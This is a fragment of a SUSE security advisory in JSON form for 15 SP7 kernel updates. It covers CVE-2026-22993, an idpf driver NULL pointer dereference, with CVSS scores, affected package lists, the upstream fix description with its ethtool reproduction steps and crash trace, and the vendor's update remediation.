"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
